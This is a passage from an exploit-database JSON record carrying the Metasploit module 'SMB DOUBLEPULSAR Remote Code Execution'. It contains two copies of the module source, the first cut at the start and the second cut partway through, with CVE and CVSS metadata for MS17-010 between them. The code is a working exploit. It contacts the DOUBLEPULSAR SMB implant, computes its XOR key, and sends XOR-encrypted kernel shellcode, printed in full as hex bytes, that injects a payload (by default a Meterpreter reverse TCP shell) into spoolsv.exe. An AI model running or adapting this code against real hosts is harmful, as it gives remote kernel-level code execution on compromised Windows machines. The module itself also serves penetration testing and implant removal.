simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-28] #"}, "lastseen": "2021-10-27T22:18:11", "differentElements": ["sourceData"], "edition": 57}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "cb85d12da091a9bca505720b8b2fa6a2", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-10-28T22:16:57", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-29702"]}, {"type": 
"rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "nessus", "idList": ["700099.PRM", "700059.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96709", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", 
"TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-28T22:16:57", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-28T22:16:57", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This 
module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => 
MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
